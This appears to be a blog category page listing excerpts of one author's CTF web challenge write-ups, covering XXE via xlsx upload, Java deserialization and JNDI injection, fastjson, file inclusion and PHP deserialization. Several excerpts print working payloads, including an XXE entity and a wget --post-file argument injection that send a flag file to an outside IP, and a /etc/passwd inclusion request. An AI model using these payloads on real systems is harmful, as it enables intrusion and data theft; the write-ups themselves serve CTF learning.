ctfwp
文章平均质量分 66
fmyyy1
最废物的web手
展开
-
d^3CTF web部分wp
d3oj提示是尝试用oct用户登陆,翻组件版本看到个合适的https://hackerone.com/reports/869574编辑文章哪里很明显POST /article/0/edit HTTP/1.1Host: xxxUser-Agent: xxAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0原创 2022-03-07 20:09:07 · 1042 阅读 · 0 评论 -
[羊城杯 2020]A Piece Of Java
[羊城杯 2020]A Piece Of Java源码逻辑不难,在hello路由对设置cookie键名为data进行反序列化问题是用的是seriakiller进行的反序列化,并且用的白名单限制。虽然题目自带了CC但是因为这个设置没法直接用。看一下题目给的条件,有个InfoInvocationHandlerpackage gdufs.challenge.web.invocation;import gdufs.challenge.web.model.Info;import java.io.S原创 2022-01-26 18:17:42 · 2265 阅读 · 2 评论 -
[SWPU2019]Web5
[SWPU2019]Web5题目给了个导入导出通讯录的功能,导出为xlsx文件,所以猜测是解析excel引起的xxe验证一下对[Content_Types].xml写入poc之后再压缩回去<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE ANYTHING [<!ENTITY % test SYSTEM "http://124.70.40.5:1234">%test;验证了xxe存在.无法直接读flag,利用jav原创 2022-01-25 22:04:31 · 619 阅读 · 0 评论 -
CVE-2019-14439以及[NPUCTF2020]EzShiro复现
CVE-2019-14439是由logback 引起的 jndi 注入,找不到详细分析的文章,对着网上的poc简单看了一下。在ch.qos.logback.core.db.JNDIConnectionSource这个类里漏洞原理并不复杂,很清晰明了的jndi注入。pocpackage Jackson;import com.fasterxml.jackson.databind.ObjectMapper;import java.io.IOException;public class原创 2021-12-22 12:40:44 · 4684 阅读 · 3 评论 -
2021安洵杯ezjson-wp
ezjson比赛只做了前两道web,这道题没去看了,因为当时看做出来的人不多就去复习了,今天有空看一下题。fd文件可以泄露 jar文件下到源码。题目环境不出网没法jndi。但题目本身留了加载字节码后门。fastjson版本1.2.47,有个通杀payload{ "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@t原创 2021-12-02 12:23:29 · 1005 阅读 · 3 评论 -
2021西湖论剑web部分wp
前言快期末了 忙里偷闲打了西湖论剑,队伍第七,又被队友带飞了,web题目质量还可以OA?RCE?环境没有写的权限,本地有打通环境打不通的情况很多之后在webmain/index/indexAction.php处有个包含任意php文件有个查看phpinfo的看了之后开着register_argc_argv,尝试包含pearcmdpayload第一步?m=index&a=getshtml&surl=Li4vLi4vLi4vLi4vLi4vdXNyL2xvY2FsL2x原创 2021-11-21 12:01:36 · 1791 阅读 · 0 评论 -
2021湖湘杯web部分wp
前言快期末了这学期准备退役了,下学期继续努力(大二课怎么这么多啊!!!期末考怎么办啊!!!一节课没听啊!!!)今天上线看看题easywill这题没啥好说,跟tp3的rce差不多直接?name=cfile&value=/etc/passwd就能文件包含,之后找不到flag,用拟态的的那个包含pearcmd.php就能getshellPentest in Autumn下个pom.xml附件 看到shiro<?xml version="1.0" encoding="UTF-8"原创 2021-11-14 20:00:19 · 1832 阅读 · 2 评论 -
陇原战疫web部分wp
webCheckIN下载源码,看到这里这里调用wget,并且参数可控,可以直接外带数据,查看绑定路由尝试访问/wget?argv=1这里应该是出题人失误,无需登录可直接访问,利用–post-file参数直接外带文件payload/wget?argv=fmyyy&argv=--post-file&argv=/flag&argv=http://124.70.40.5:1234服务器开个监听直接打就行eaaasyphp反序列化,有个file_put_conten原创 2021-11-08 10:41:57 · 767 阅读 · 0 评论 -
长城杯线下赛赛后复现
长城杯线下赛赛后复现前言去打了长城杯决赛,结果全程坐牢,果然不联网的web太难了,赛后拿到了两个web靶机的wp,复现一下。fancyapi目录结构逻辑很简单,web用的是python的flask框架,然后go写了几个接口处理数据。看看backend.gofunc Flag(w http.ResponseWriter, r *http.Request ) { action:= r.URL.Query().Get("action") if action == "" { fail(w,原创 2021-10-14 07:29:30 · 1031 阅读 · 2 评论 -
2021第五空间webakwp
前言挺傻逼的,5道web题全是静态靶机,三道rce题,一直有人搅屎,不知道主办方咋想的。附一张图不过也算是ak了web 总体感觉还不错webftp这题就要说到搅屎的问题了,我直接扫路径扫到1.txt看到flag,大概是哪位大师傅放的赛后跟别的师傅聊了一下,预期解是github上能下载源码然后看就行。EasyCleanup源码逻辑很简单,给了phpinfo和任意文件包含这里的 session.upload_progress.cleanup 是off的,不会自动清除session文件那原创 2021-09-18 13:19:34 · 1043 阅读 · 1 评论 -
2021祥云杯web 部分wp
ezyii说是最新的链子,题目把文件都筛选好了让我们找。写一下我的思路看到RunProcess类<?phpnamespace Codeception\Extension;class RunProcess{ protected $output; protected $config = ['sleep' => 0]; protected static $events = []; private $processes = []; publ原创 2021-08-23 17:06:42 · 713 阅读 · 5 评论